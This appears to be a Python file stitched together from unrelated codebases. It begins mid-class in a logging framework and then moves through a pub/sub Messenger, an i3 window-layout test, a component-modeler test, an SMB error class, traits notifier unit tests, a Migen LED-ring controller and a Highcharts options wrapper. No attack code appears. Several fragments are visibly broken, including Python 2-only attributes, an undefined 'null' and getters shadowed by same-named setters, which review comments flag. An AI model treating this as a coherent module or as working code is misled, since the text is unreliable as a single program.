        """Return the time.strftime format used for the 'date' field."""
        return self._date_format
    def setDateFormat(self, _format):
        """Set the time.strftime format used for the 'date' field."""
        self._date_format = _format
    def setInfoLogLabel(self, level, label):
        """Set the prefix label for one or more info levels (or ALL)."""
        levels = self._getLevels(level)
        for level in levels:
            self._checkLogLevel(level, min_level=self.FATAL, max_level=self.INFO_MAX)
            self._label[level] = label
    def setDebugLogLabel(self, level, label):
        """Set the prefix label for one or more debug levels (or ALL)."""
        levels = self._getLevels(level, is_debug=1)
        for level in levels:
            self._checkLogLevel(level, min_level=self.INFO1, max_level=self.DEBUG_MAX)
            self._debug_label[level] = label
    def setInfoLogging(self, domain, target, level=ALL, fmt=None):
        """Replace info routing for the given domain/target/levels."""
        self._setLogging(domain, target, level, fmt, is_debug=0)
    def setDebugLogging(self, domain, target, level=ALL, fmt=None):
        """Replace debug routing for the given domain/target/levels."""
        self._setLogging(domain, target, level, fmt, is_debug=1)
    def addInfoLogging(self, domain, target, level=ALL, fmt=None):
        """Append info routing without removing existing entries."""
        self._addLogging(domain, target, level, fmt, is_debug=0)
    def addDebugLogging(self, domain, target, level=ALL, fmt=None):
        """Append debug routing without removing existing entries."""
        self._addLogging(domain, target, level, fmt, is_debug=1)
    def delInfoLogging(self, domain, target, level=ALL, fmt=None):
        """Remove a matching info routing entry."""
        self._delLogging(domain, target, level, fmt, is_debug=0)
    def delDebugLogging(self, domain, target, level=ALL, fmt=None):
        """Remove a matching debug routing entry."""
        self._delLogging(domain, target, level, fmt, is_debug=1)
    def isInfoLoggingHere(self, level):
        """True if an info record at `level` from the caller's domain would be emitted."""
        return self._isLoggingHere(level, is_debug=0)
    def isDebugLoggingHere(self, level):
        """True if a debug record at `level` from the caller's domain would be emitted."""
        return self._isLoggingHere(level, is_debug=1)
    def fatal(self, _format, *args, **kwargs):
        """Log a FATAL record."""
        self._checkKWargs(kwargs)
        kwargs['is_debug'] = 0
        self._log(self.FATAL, _format, *args, **kwargs)
    def error(self, _format, *args, **kwargs):
        """Log an ERROR record."""
        self._checkKWargs(kwargs)
        kwargs['is_debug'] = 0
        self._log(self.ERROR, _format, *args, **kwargs)
    def warning(self, _format, *args, **kwargs):
        """Log a WARNING record."""
        self._checkKWargs(kwargs)
        kwargs['is_debug'] = 0
        self._log(self.WARNING, _format, *args, **kwargs)
    def info(self, level, _format, *args, **kwargs):
        """Log an info record at INFO<level> (1..INFO_MAX)."""
        self._checkLogLevel(level, min_level=1, max_level=self.INFO_MAX)
        self._checkKWargs(kwargs)
        kwargs['is_debug'] = 0
        # Shift into the shared level space (info levels sit above NO_INFO).
        self._log((level + self.NO_INFO), _format, *args, **kwargs)
    def debug(self, level, _format, *args, **kwargs):
        """Log a debug record at DEBUG<level> (1..DEBUG_MAX)."""
        self._checkLogLevel(level, min_level=1, max_level=self.DEBUG_MAX)
        self._checkKWargs(kwargs)
        kwargs['is_debug'] = 1
        self._log(level, _format, *args, **kwargs)
    def exception(self):
        """Log the current exception traceback at TRACEBACK level."""
        # NOTE(review): 'args'/'kwargs' here become entries in _log's **kwargs
        # and are never read by it — they appear to be vestigial.
        self._log(self.TRACEBACK, traceback.format_exc(), args=[], kwargs={})
    def _checkLogLevel(self, level, min_level, max_level):
        # Raise ValueError if `level` is outside [min_level, max_level].
        if ((level < min_level) or (level > max_level)):
            raise ValueError(('Level %d out of range, should be [%d..%d].' % (level, min_level, max_level)))
    def _checkKWargs(self, kwargs):
        # Only 'nl', 'fmt' and 'nofmt' are valid logging keyword options.
        if (not kwargs):
            return
        for key in kwargs.keys():
            if (key not in ['nl', 'fmt', 'nofmt']):
                raise ValueError(("Key '%s' is not allowed as argument for logging." % key))
    def _checkDomain(self, domain):
        # A domain must be a non-empty string.
        if ((not domain) or (domain == '')):
            raise ValueError(("Domain '%s' is not valid." % domain))
    def _getLevels(self, level, is_debug=0):
        # Normalize `level` (scalar, list/tuple, or ALL) into a validated list.
        if (level != self.ALL):
            if (isinstance(level, list) or isinstance(level, tuple)):
                levels = level
            else:
                levels = [level]
            for level in levels:
                if is_debug:
                    self._checkLogLevel(level, min_level=1, max_level=self.DEBUG_MAX)
                else:
                    self._checkLogLevel(level, min_level=self.FATAL, max_level=self.INFO_MAX)
        elif is_debug:
            # NOTE(review): these ranges exclude DEBUG_MAX / INFO_MAX themselves,
            # unlike the explicit "+ 1" ranges used in __init__ — possible
            # off-by-one; confirm intended ALL semantics.
            levels = [i for i in range(self.DEBUG1, self.DEBUG_MAX)]
        else:
            levels = [i for i in range(self.FATAL, self.INFO_MAX)]
        return levels
    def _getTargets(self, target):
        # Normalize `target` into a list and verify each is a LogTarget.
        if (isinstance(target, list) or isinstance(target, tuple)):
            targets = target
        else:
            targets = [target]
        for _target in targets:
            if (not issubclass(_target.__class__, LogTarget)):
                raise ValueError(("'%s' is no valid logging target." % _target.__class__.__name__))
        return targets
    def _genDomains(self, is_debug=0):
        # Rebuild the per-level domain cache from the current routing table.
        if is_debug:
            _domains = self._debug_domains
            _logging = self._debug_logging
            _range = (1, (self.DEBUG_MAX + 1))
        else:
            _domains = self._domains
            _logging = self._logging
            _range = (self.FATAL, (self.INFO_MAX + 1))
        if (len(_domains) > 0):
            _domains.clear()
        for level in range(_range[0], _range[1]):
            if (level not in _logging):
                continue
            # NOTE(review): the membership test checks `domain` against the
            # dict's *keys* (levels), not against the per-level domain lists —
            # this may admit duplicate domains per level; verify intent.
            for (domain, dummy, dummy) in _logging[level]:
                if (domain not in _domains):
                    _domains.setdefault(level, []).append(domain)
    def _setLogging(self, domain, target, level=ALL, fmt=None, is_debug=0):
        # Replace the routing entry list for each selected level.
        self._checkDomain(domain)
        levels = self._getLevels(level, is_debug)
        targets = self._getTargets(target)
        if is_debug:
            _logging = self._debug_logging
        else:
            _logging = self._logging
        for level in levels:
            for target in targets:
                _logging[level] = [(domain, target, fmt)]
        self._genDomains(is_debug)
    def _addLogging(self, domain, target, level=ALL, fmt=None, is_debug=0):
        # Append a (domain, target, fmt) routing entry for each selected level.
        self._checkDomain(domain)
        levels = self._getLevels(level, is_debug)
        targets = self._getTargets(target)
        if is_debug:
            _logging = self._debug_logging
        else:
            _logging = self._logging
        for level in levels:
            for target in targets:
                _logging.setdefault(level, []).append((domain, target, fmt))
        self._genDomains(is_debug)
    def _delLogging(self, domain, target, level=ALL, fmt=None, is_debug=0):
        # Remove a matching routing entry; raises ValueError on a miss unless
        # the caller asked for ALL levels.
        self._checkDomain(domain)
        levels = self._getLevels(level, is_debug)
        targets = self._getTargets(target)
        if is_debug:
            _logging = self._debug_logging
        else:
            _logging = self._logging
        for _level in levels:
            for target in targets:
                if (_level not in _logging):
                    continue
                if ((domain, target, fmt) in _logging[_level]):
                    _logging[_level].remove((domain, target, fmt))
                    if (len(_logging[_level]) == 0):
                        del _logging[_level]
                    continue
                if (level != self.ALL):
                    raise ValueError(('No matching logging for level %d, domain %s, target %s and format %s.' % (_level, domain, target.__class__.__name__, fmt)))
        self._genDomains(is_debug)
    def _isLoggingHere(self, level, is_debug=0):
        # Would a record at `level` from the caller's domain reach any target?
        _dict = self._genDict(level, is_debug)
        if (not _dict):
            return False
        point_domain = (_dict['domain'] + '.')
        if is_debug:
            _logging = self._debug_logging
        else:
            _logging = self._logging
        for (domain, dummy, dummy) in _logging[level]:
            if ((domain == '*') or point_domain.startswith(domain) or fnmatch.fnmatchcase(_dict['domain'], domain)):
                return True
        return False
    def _getClass(self, frame):
        # Best-effort lookup of the class owning the code object in `frame`.
        if (frame.f_code.co_argcount > 0):
            # Heuristic: if the first argument looks like `self`, search its class.
            selfname = frame.f_code.co_varnames[0]
            if (selfname in frame.f_locals):
                _self = frame.f_locals[selfname]
                obj = self._getClass2(_self.__class__, frame.f_code)
                if obj:
                    return obj
        module = inspect.getmodule(frame.f_code)
        code = frame.f_code
        # Module-level function: not owned by any class.
        # NOTE(review): 'func_code' is the Python 2 attribute name; on Python 3
        # functions expose __code__, so this hasattr check never succeeds there.
        if (code.co_name in module.__dict__):
            if (hasattr(module.__dict__[code.co_name], 'func_code') and (module.__dict__[code.co_name].__code__ == code)):
                return None
        # NOTE(review): types.ClassType is Python 2 only (old-style classes);
        # on Python 3 this attribute does not exist and would raise
        # AttributeError if this loop body is reached.
        for (dummy, obj) in module.__dict__.items():
            if isinstance(obj, types.ClassType):
                if hasattr(obj, code.co_name):
                    value = getattr(obj, code.co_name)
                    if isinstance(value, types.FunctionType):
                        if (value.__code__ == code):
                            return obj
        return None
    def _getClass2(self, obj, code):
        # Recursively search `obj` and its bases for the function owning `code`.
        for value in obj.__dict__.values():
            if isinstance(value, types.FunctionType):
                if (value.__code__ == code):
                    return obj
        for base in obj.__bases__:
            _obj = self._getClass2(base, code)
            if _obj:
                return _obj
        return None
    def _log(self, level, _format, *args, **kwargs):
        # Core dispatch: format the record and write it to each matching target.
        is_debug = 0
        if ('is_debug' in kwargs):
            is_debug = kwargs['is_debug']
        nl = 1
        if ('nl' in kwargs):
            nl = kwargs['nl']
        nofmt = 0
        if ('nofmt' in kwargs):
            nofmt = kwargs['nofmt']
        _dict = self._genDict(level, is_debug)
        if (not _dict):
            return
        # %-format the message against positional args (tuple vs scalar).
        if (len(args) > 1):
            _dict['message'] = (_format % args)
        elif (len(args) == 1):
            _dict['message'] = (_format % args[0])
        else:
            _dict['message'] = _format
        point_domain = (_dict['domain'] + '.')
        if is_debug:
            _logging = self._debug_logging
        else:
            _logging = self._logging
        # Write to each matching target at most once.
        used_targets = []
        for (domain, target, _format) in _logging[level]:
            if (target in used_targets):
                continue
            if ((domain == '*') or point_domain.startswith((domain + '.')) or fnmatch.fnmatchcase(_dict['domain'], domain)):
                # Per-entry fmt overrides the global format; 'fmt' kwarg overrides both.
                if (not _format):
                    _format = self._format
                if ('fmt' in kwargs):
                    _format = kwargs['fmt']
                if nofmt:
                    target.write(_dict['message'], level, self, is_debug)
                else:
                    target.write((_format % _dict), level, self, is_debug)
                if nl:
                    target.write('\n', level, self, is_debug)
                used_targets.append(target)
    def _genDict(self, level, is_debug=0):
        # Build the format dict (file/line/module/class/function/domain/...) for
        # a record at `level`, or return None if nothing would log it.
        check_domains = []
        simple_match = False
        if is_debug:
            _dict = self._debug_level
            _domains = self._debug_domains
            _label = self._debug_label
        else:
            _dict = self._level
            _domains = self._domains
            _label = self._label
        # Decide whether any configured level admits this record; '*' is a
        # catch-all, otherwise collect candidate domains to check later.
        for domain in _dict:
            if (domain == '*'):
                if (_dict[domain] >= level):
                    simple_match = True
                    if (len(check_domains) > 0):
                        check_domains = []
                    break
            elif (_dict[domain] >= level):
                check_domains.append(domain)
        if ((not simple_match) and (len(check_domains) < 1)):
            return None
        if (level not in _domains):
            return None
        # Walk up the stack past this logging module to find the caller's frame.
        f = inspect.currentframe()
        while (f and f.f_back and (f.f_globals['__name__'] == self.__module__)):
            f = f.f_back
        if (not f):
            raise ValueError('Frame information not available.')
        module_name = f.f_globals['__name__']
        point_module = (module_name + '.')
        # A module-level prefix match short-circuits the per-domain checks below.
        for domain in check_domains:
            if point_module.startswith(domain):
                check_domains = []
                break
        co = f.f_code
        # Early rejection: every configured domain must be compatible with the
        # caller's module name (prefix in either direction; '*'-prefixed skip).
        _len = len(module_name)
        for domain in _domains[level]:
            i = domain.find('*')
            if (i == 0):
                continue
            elif (i > 0):
                d = domain[:i]
            else:
                d = domain
            if (_len >= len(d)):
                if (not module_name.startswith(d)):
                    return None
            elif (not d.startswith(module_name)):
                return None
        level_str = ''
        if (level in _label):
            level_str = _label[level]
        _dict = {'file': co.co_filename, 'line': f.f_lineno, 'module': module_name, 'class': '', 'function': co.co_name, 'domain': '', 'label': level_str, 'level': level, 'date': time.strftime(self._date_format, time.localtime())}
        if (_dict['function'] == '?'):
            _dict['function'] = ''
        # Resolving the owning class is expensive; only do it when the format
        # or a configured non-wildcard domain actually needs it.
        domain_needed = False
        for domain in _domains[level]:
            if (domain == '*'):
                continue
            domain_needed = True
            break
        if ((self._format.find('%(domain)') >= 0) or (self._format.find('%(class)') >= 0) or domain_needed or (len(check_domains) > 0)):
            obj = self._getClass(f)
            if obj:
                _dict['class'] = obj.__name__
        # domain = module[.class][.function]
        _dict['domain'] = ('' + _dict['module'])
        if (_dict['class'] != ''):
            _dict['domain'] += ('.' + _dict['class'])
        if (_dict['function'] != ''):
            _dict['domain'] += ('.' + _dict['function'])
        if (len(check_domains) < 1):
            return _dict
        point_domain = (_dict['domain'] + '.')
        for domain in check_domains:
            if (point_domain.startswith(domain) or fnmatch.fnmatchcase(_dict['domain'], domain)):
                return _dict
        return None
class Messenger():
    """Publish/subscribe hub using the Borg pattern: every instance shares the
    same state dict (_shared_data), so any Messenger() sees the same signals.

    Callbacks may be plain functions (held strongly) or bound methods (held
    via a weakref to the instance so subscribers can be garbage collected).
    """
    # All instances alias this dict as their __dict__ (Borg pattern).
    _shared_data = _saved
    def __init__(self):
        self.__dict__ = self._shared_data
        # First-ever construction initializes the shared state.
        if (not hasattr(self, '_signals')):
            self._signals = {}
            # Events delivered to every subscriber regardless of event name.
            self._catch_all = ['AnyEvent', 'all']
    def connect(self, obj, event, callback):
        """Register `callback` for `event` on source `obj`.

        Raises MessengerError if callback is neither a function nor a method.
        """
        typ = type(callback)
        key = hash(obj)
        if (not (key in self._signals)):
            self._signals[key] = {}
        signals = self._signals[key]
        if (not (event in signals)):
            signals[event] = {}
        slots = signals[event]
        callback_key = hash(callback)
        if (typ is types.FunctionType):
            # Plain function: store a strong reference (no owner instance).
            slots[callback_key] = (None, callback)
        elif (typ is types.MethodType):
            # Bound method: weakref the instance + method name, so the
            # subscription does not keep the subscriber alive.
            obj = weakref.ref(callback.__self__)
            name = callback.__name__
            slots[callback_key] = (obj, name)
        else:
            raise MessengerError(('Callback must be a function or method. You passed a %s.' % str(callback)))
    def disconnect(self, obj, event=None, callback=None, obj_is_hash=False):
        """Remove subscriptions: all for obj, all for (obj, event), or one callback.

        obj_is_hash: treat `obj` as an already-computed hash key.
        """
        signals = self._signals
        if obj_is_hash:
            key = obj
        else:
            key = hash(obj)
        if (not (key in signals)):
            return
        if (callback is None):
            if (event is None):
                del signals[key]
            else:
                del signals[key][event]
        else:
            del signals[key][event][hash(callback)]
    def send(self, source, event, *args, **kw_args):
        """Dispatch `event` from `source` to its subscribers and catch-all listeners.

        Dead weakref'd subscribers are pruned as they are encountered.
        Unregistered sources are silently ignored.
        """
        try:
            sigs = self._get_signals(source)
        except (MessengerError, KeyError):
            return
        events = self._catch_all[:]
        if (event not in events):
            events.append(event)
        for evt in events:
            if (evt in sigs):
                slots = sigs[evt]
                # Iterate over a snapshot of keys: dead slots are deleted inline.
                for key in list(slots.keys()):
                    (obj, meth) = slots[key]
                    if obj:
                        inst = obj()
                        if inst:
                            getattr(inst, meth)(source, event, *args, **kw_args)
                        else:
                            # Subscriber instance was garbage collected.
                            del slots[key]
                    else:
                        meth(source, event, *args, **kw_args)
    def is_registered(self, obj):
        """Return 1 if `obj` has any registered signals, else 0."""
        try:
            sigs = self._get_signals(obj)
        except MessengerError:
            return 0
        else:
            return 1
    def get_signal_names(self, obj):
        """Return the event names registered for `obj` (raises if unregistered)."""
        return list(self._get_signals(obj).keys())
    def _get_signals(self, obj):
        # Look up obj's event->slots mapping; raise MessengerError if absent.
        ret = self._signals.get(hash(obj))
        if (ret is None):
            raise MessengerError(('No such object: %s, has registered itself with the messenger.' % obj))
        else:
            return ret
class TestCompanion(I3LayoutScenario):
    """i3 layout scenario test for the 'companion' layout: every odd window is
    paired with the following (companion) window in the same column, with a
    configurable height ratio and companion placement.
    """
    def test_scenario(self):
        # NOTE(review): 'senario' looks like a typo for 'scenario' — presumably
        # the helper is defined under this name on I3LayoutScenario; verify.
        for params in self.layout_params():
            self.senario(params)
            self._close_all()
    def layout(self, params: List) -> str:
        """Render the layout command string for one parameter triple."""
        (odd_companion_ratio, even_companion_ratio, companion_position) = params
        return f'companion {odd_companion_ratio} {even_companion_ratio} {companion_position}'
    def layout_params(self) -> List:
        """Parameter triples: (odd ratio, even ratio, companion position)."""
        return [[0.3, 0.4, 'up'], [0.3, 0.4, 'down'], [0.3, 0.4, 'alt-up'], [0.3, 0.4, 'alt-down']]
    def alternate_layout(self) -> str:
        """Fallback layout used by the scenario machinery."""
        return 'hstack'
    def validate(self, args):
        """Assert window geometries honor the companion pairing rules.

        Paired windows share an x column; the companion sits above/below per
        `companion_position` (alternating per pair for 'alt-*'); heights split
        by the configured ratio. An unpaired trailing window gets full height.
        """
        (odd_ratio, even_ratio, companion_position) = args
        windows = self.workspaces.windows()
        geoms = [self._get_window_geometry(window) for window in windows]
        for (i, geom) in enumerate(geoms[0::2]):
            if (((len(geoms) % 2) == 0) or (((i * 2) + 1) < len(geoms))):
                companion_geom = geoms[((i * 2) + 1)]
                # Paired windows occupy the same column.
                assert (geom.x == companion_geom.x)
                # +1 when the companion should be above, -1 when below.
                is_up = (1 if ((companion_position == 'up') or ((companion_position == 'alt-up') and ((i % 2) == 0)) or ((companion_position == 'alt-down') and ((i % 2) == 1))) else (- 1))
                assert (geom.y > (is_up * (companion_geom.y + companion_geom.height)))
                # The pair's heights split according to the configured ratio.
                ratio = (odd_ratio if ((i % 2) == 0) else even_ratio)
                assert (geom.height == approx(((1 - ratio) * (companion_geom.height + geom.height)), abs=2))
            else:
                # Unpaired trailing window: full workspace height (800px here).
                assert (geom.height == approx(800, abs=2))
            if (i > 0):
                # Columns progress left to right.
                assert (geom.x > geoms[((i - 1) * 2)].x)
def test_run_component_modeler_mappings(monkeypatch, tmp_path):
    """Component modeler run honours user-supplied element mappings."""
    # Each mapping ties one S-matrix element to another via a complex
    # scaling coefficient.
    mappings = (
        ((('left_bot', 0), ('right_bot', 0)), (('left_top', 0), ('right_top', 0)), (- 1j)),
        ((('left_bot', 0), ('right_top', 0)), (('left_top', 0), ('right_bot', 0)), (+ 1)),
    )
    modeler = make_component_modeler(element_mappings=mappings, path_dir=str(tmp_path))
    scattering = run_component_modeler(monkeypatch, modeler)
    # Verify the mapped elements obey the declared relations.
    _test_mappings(mappings, scattering)
class SessionError(Exception):
    """SMB session-level error carrying an NT status code and the raw packet."""

    def __init__(self, error=0, packet=0):
        Exception.__init__(self)
        self.error = error
        self.packet = packet

    def getErrorCode(self):
        """Return the numeric NT status code."""
        return self.error

    def getErrorPacket(self):
        """Return the packet that triggered this error."""
        return self.packet

    def getErrorString(self):
        """Return the formatted error description."""
        return str(self)

    def __str__(self):
        # Resolve the NT status code to its (short, verbose) messages;
        # fall back to a generic line for unknown codes.
        messages = nt_errors.ERROR_MESSAGES.get(self.error)
        if messages is None:
            return ('SMB SessionError: unknown error code: 0x%x' % self.error)
        (error_msg_short, error_msg_verbose) = (messages[0], messages[1])
        return ('SMB SessionError: code: 0x%x - %s - %s' % (self.error, error_msg_short, error_msg_verbose))
class TestTraitEventNotifierAddRemove(unittest.TestCase):
    """Tests for TraitEventNotifier add_to / remove_from bookkeeping.

    Covers reference counting for equivalent notifiers, removal errors,
    and the one-observable-per-notifier restriction.
    """

    def setUp(self):
        # Re-raise handler exceptions so they fail the test directly;
        # the handler is popped automatically via addCleanup, so no
        # tearDown override is needed.
        push_exception_handler(reraise_exceptions=True)
        self.addCleanup(pop_exception_handler)

    def test_add_to_observable(self):
        """add_to appends the notifier to the observable's list."""
        dummy = DummyObservable()
        dummy.notifiers = [str, float]
        notifier = create_notifier()
        notifier.add_to(dummy)
        self.assertEqual(dummy.notifiers, [str, float, notifier])

    def test_add_to_observable_twice_increase_count(self):
        """Adding an equivalent notifier bumps the ref count, not the list."""
        dummy = DummyObservable()
        def handler(event):
            pass
        notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier2 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier1.add_to(dummy)
        notifier2.add_to(dummy)
        self.assertEqual(dummy.notifiers, [notifier1])
        self.assertEqual(notifier1._ref_count, 2)

    def test_add_to_observable_different_notifier(self):
        """Notifiers with different targets are stored separately."""
        dummy = DummyObservable()
        def handler(event):
            pass
        notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier2 = create_notifier(handler=handler, target=dummy)
        notifier1.add_to(dummy)
        notifier2.add_to(dummy)
        self.assertEqual(dummy.notifiers, [notifier1, notifier2])

    def test_remove_from_observable(self):
        """An equivalent notifier can remove the registered one."""
        dummy = DummyObservable()
        def handler(event):
            pass
        notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier2 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier1.add_to(dummy)
        self.assertEqual(dummy.notifiers, [notifier1])
        notifier2.remove_from(dummy)
        self.assertEqual(dummy.notifiers, [])

    def test_remove_from_observable_with_ref_count(self):
        """Removal decrements the ref count before dropping the notifier."""
        dummy = DummyObservable()
        def handler(event):
            pass
        notifier1 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier2 = create_notifier(handler=handler, target=_DUMMY_TARGET)
        notifier1.add_to(dummy)
        notifier1.add_to(dummy)
        self.assertEqual(dummy.notifiers, [notifier1])
        notifier2.remove_from(dummy)
        self.assertEqual(dummy.notifiers, [notifier1])
        notifier2.remove_from(dummy)
        self.assertEqual(dummy.notifiers, [])

    def test_remove_from_error_if_not_found(self):
        """Removing an unregistered notifier raises NotifierNotFound."""
        dummy = DummyObservable()
        notifier1 = create_notifier()
        with self.assertRaises(NotifierNotFound) as e:
            notifier1.remove_from(dummy)
        self.assertEqual(str(e.exception), 'Notifier not found.')

    def test_remove_from_differentiate_not_equal_notifier(self):
        """Only an equal notifier is removed, not just any notifier."""
        dummy = DummyObservable()
        notifier1 = create_notifier(handler=mock.Mock())
        notifier2 = create_notifier(handler=mock.Mock())
        notifier1.add_to(dummy)
        notifier2.add_to(dummy)
        notifier2.remove_from(dummy)
        self.assertEqual(dummy.notifiers, [notifier1])

    def test_add_to_multiple_observables(self):
        """A notifier may be attached to only one observable."""
        dummy1 = DummyObservable()
        dummy2 = DummyObservable()
        notifier = create_notifier()
        notifier.add_to(dummy1)
        with self.assertRaises(RuntimeError) as exception_context:
            notifier.add_to(dummy2)
        self.assertEqual(str(exception_context.exception), 'Sharing notifiers across observables is unexpected.')
class RingControl(Module):
    """Migen controller that chases one (or two) lit LEDs around a ring.

    Drives a RingSerialCtrl with a rotating LED bitmask, advancing one
    step every 50 ms of system clock time.
    """

    def __init__(self, pad, mode, color, nleds, sys_clk_freq):
        # Serial driver for the LED ring hardware.
        ring = RingSerialCtrl(nleds, sys_clk_freq)
        self.submodules += ring
        # 50 ms tick that paces the rotation.
        ring_timer = WaitTimer(int((0.05 * sys_clk_freq)))
        self.submodules += ring_timer
        # Current position in the 12-entry pattern table.
        index = Signal(12, reset=1)
        # NOTE(review): `mode == mode.DOUBLE` looks up DOUBLE through the
        # instance itself; this works for enum members but comparing
        # against the enum class attribute directly would be clearer --
        # confirm the type of `mode` before changing.
        if (mode == mode.DOUBLE):
            print('Led ring controller configured for dual led')
            # Each mask lights two LEDs at once (two bits set).
            led_array = Array([2080, 1040, 520, 260, 130, 65, 2080, 1040, 520, 260, 130, 65])
        else:
            print('Led ring controller configured for single led')
            # One-hot masks walking a single LED around the ring.
            led_array = Array([2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1])
        # Restart the timer as soon as it expires (free-running tick).
        self.comb += ring_timer.wait.eq((~ ring_timer.done))
        # Advance the index each tick; the inner If wins on index == 11,
        # wrapping back to 0.
        self.sync += [If(ring_timer.done, index.eq((index + 1)), If((index == 11), index.eq(0)))]
        self.comb += ring.leds.eq(led_array[index])
        self.comb += [ring.colors.eq(color), pad.eq(ring.do)]
class OptionSeriesVariablepie(Options):
    """Auto-generated option wrapper for the Highcharts `variablepie` series.

    Every scalar option appears as a getter/setter pair: the first `def`
    returns the Highcharts default via `self._config_get`, the second
    writes the value through `self._config`. Sub-option groups (data,
    events, tooltip, ...) return typed wrappers via `self._config_sub_data`.

    NOTE(review): the pairs carry no `@property` decorators, so the second
    definition of each name shadows the first and only the setters remain
    reachable. This appears to mirror the generated upstream source --
    confirm against the generator before restructuring.
    """

    def accessibility(self) -> 'OptionSeriesVariablepieAccessibility':
        return self._config_sub_data('accessibility', OptionSeriesVariablepieAccessibility)
    def allowPointSelect(self):
        return self._config_get(False)
    def allowPointSelect(self, flag: bool):
        self._config(flag, js_type=False)
    def animation(self):
        return self._config_get(True)
    def animation(self, flag: bool):
        self._config(flag, js_type=False)
    def animationLimit(self):
        return self._config_get(None)
    def animationLimit(self, num: float):
        self._config(num, js_type=False)
    def borderColor(self):
        return self._config_get('#ffffff')
    def borderColor(self, text: str):
        self._config(text, js_type=False)
    def borderRadius(self):
        return self._config_get(3)
    def borderRadius(self, num: float):
        self._config(num, js_type=False)
    def borderWidth(self):
        return self._config_get(1)
    def borderWidth(self, num: float):
        self._config(num, js_type=False)
    def center(self):
        # NOTE(review): `null` is not defined in Python; this getter is
        # shadowed by the setter below, so the NameError is unreachable.
        return self._config_get([null, null])
    def center(self, value: Any):
        self._config(value, js_type=False)
    def className(self):
        return self._config_get(None)
    def className(self, text: str):
        self._config(text, js_type=False)
    def clip(self):
        return self._config_get(False)
    def clip(self, flag: bool):
        self._config(flag, js_type=False)
    def color(self):
        return self._config_get('#cccccc')
    def color(self, text: str):
        self._config(text, js_type=False)
    def colorAxis(self):
        return self._config_get(0)
    def colorAxis(self, num: float):
        self._config(num, js_type=False)
    def colorIndex(self):
        return self._config_get(None)
    def colorIndex(self, num: float):
        self._config(num, js_type=False)
    def colorKey(self):
        return self._config_get('y')
    def colorKey(self, text: str):
        self._config(text, js_type=False)
    def colors(self):
        return self._config_get(None)
    def colors(self, value: Any):
        self._config(value, js_type=False)
    def connectEnds(self):
        return self._config_get(None)
    def connectEnds(self, flag: bool):
        self._config(flag, js_type=False)
    def connectNulls(self):
        return self._config_get(False)
    def connectNulls(self, flag: bool):
        self._config(flag, js_type=False)
    def crisp(self):
        return self._config_get(True)
    def crisp(self, flag: bool):
        self._config(flag, js_type=False)
    def cropThreshold(self):
        return self._config_get(300)
    def cropThreshold(self, num: float):
        self._config(num, js_type=False)
    def cursor(self):
        return self._config_get(None)
    def cursor(self, text: str):
        self._config(text, js_type=False)
    def custom(self):
        return self._config_get(None)
    def custom(self, value: Any):
        self._config(value, js_type=False)
    def dashStyle(self):
        return self._config_get('Solid')
    def dashStyle(self, text: str):
        self._config(text, js_type=False)
    def data(self) -> 'OptionSeriesVariablepieData':
        return self._config_sub_data('data', OptionSeriesVariablepieData)
    def dataLabels(self) -> 'OptionSeriesVariablepieDatalabels':
        return self._config_sub_data('dataLabels', OptionSeriesVariablepieDatalabels)
    def depth(self):
        return self._config_get(0)
    def depth(self, num: float):
        self._config(num, js_type=False)
    def description(self):
        return self._config_get(None)
    def description(self, text: str):
        self._config(text, js_type=False)
    def dragDrop(self) -> 'OptionSeriesVariablepieDragdrop':
        return self._config_sub_data('dragDrop', OptionSeriesVariablepieDragdrop)
    def enableMouseTracking(self):
        return self._config_get(True)
    def enableMouseTracking(self, flag: bool):
        self._config(flag, js_type=False)
    def endAngle(self):
        return self._config_get(None)
    def endAngle(self, num: float):
        self._config(num, js_type=False)
    def events(self) -> 'OptionSeriesVariablepieEvents':
        return self._config_sub_data('events', OptionSeriesVariablepieEvents)
    def fillColor(self):
        return self._config_get('undefined')
    def fillColor(self, text: str):
        self._config(text, js_type=False)
    def findNearestPointBy(self):
        return self._config_get('x')
    def findNearestPointBy(self, text: str):
        self._config(text, js_type=False)
    def getExtremesFromAll(self):
        return self._config_get(False)
    def getExtremesFromAll(self, flag: bool):
        self._config(flag, js_type=False)
    def id(self):
        return self._config_get(None)
    def id(self, text: str):
        self._config(text, js_type=False)
    def ignoreHiddenPoint(self):
        return self._config_get(True)
    def ignoreHiddenPoint(self, flag: bool):
        self._config(flag, js_type=False)
    def inactiveOtherPoints(self):
        return self._config_get(True)
    def inactiveOtherPoints(self, flag: bool):
        self._config(flag, js_type=False)
    def includeInDataExport(self):
        return self._config_get(None)
    def includeInDataExport(self, flag: bool):
        self._config(flag, js_type=False)
    def index(self):
        return self._config_get(None)
    def index(self, num: float):
        self._config(num, js_type=False)
    def innerSize(self):
        return self._config_get(0)
    def innerSize(self, num: float):
        self._config(num, js_type=False)
    def keys(self):
        return self._config_get(None)
    def keys(self, value: Any):
        self._config(value, js_type=False)
    def label(self) -> 'OptionSeriesVariablepieLabel':
        return self._config_sub_data('label', OptionSeriesVariablepieLabel)
    def legendIndex(self):
        return self._config_get(None)
    def legendIndex(self, num: float):
        self._config(num, js_type=False)
    def legendSymbol(self):
        return self._config_get('rectangle')
    def legendSymbol(self, text: str):
        self._config(text, js_type=False)
    def linecap(self):
        # NOTE(review): passes the builtin `round` instead of the string
        # 'round' -- unreachable (shadowed by the setter), but looks wrong.
        return self._config_get(round)
    def linecap(self, value: Any):
        self._config(value, js_type=False)
    def lineWidth(self):
        return self._config_get(2)
    def lineWidth(self, num: float):
        self._config(num, js_type=False)
    def linkedTo(self):
        return self._config_get(None)
    def linkedTo(self, text: str):
        self._config(text, js_type=False)
    def marker(self) -> 'OptionSeriesVariablepieMarker':
        return self._config_sub_data('marker', OptionSeriesVariablepieMarker)
    def maxPointSize(self):
        return self._config_get('100%')
    def maxPointSize(self, num: float):
        self._config(num, js_type=False)
    def minPointSize(self):
        return self._config_get('10%')
    def minPointSize(self, num: float):
        self._config(num, js_type=False)
    def minSize(self):
        return self._config_get(80)
    def minSize(self, num: float):
        self._config(num, js_type=False)
    def name(self):
        return self._config_get(None)
    def name(self, text: str):
        self._config(text, js_type=False)
    def negativeColor(self):
        return self._config_get(None)
    def negativeColor(self, text: str):
        self._config(text, js_type=False)
